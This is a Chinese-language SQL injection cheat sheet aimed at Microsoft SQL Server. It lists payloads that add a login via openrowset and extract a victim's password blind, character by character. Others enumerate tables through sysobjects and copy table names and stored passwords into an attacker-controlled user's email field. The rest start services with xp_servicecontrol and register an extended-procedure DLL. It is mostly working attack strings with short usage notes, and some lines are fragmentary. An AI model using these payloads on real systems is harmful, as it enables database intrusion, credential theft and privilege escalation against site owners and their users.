SQL注入总结大全

如果被限制则可以。

select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')

传统查询构造：

select * FROM news where id=... AND topic=... AND .....

admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'

select 123;--

;use master;--

:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。

'and 1<>(select count(email) from [user]);--

;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--

说明:

上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

通过查看ffff的用户资料可得第一个用表叫ad

然后根据表名ad得到这个表的ID

ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--

象下面这样就可以得到第二个表的名字了

ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
sp_addextendedproc 'xp_webserver', 'c:tempxp_foo.dll'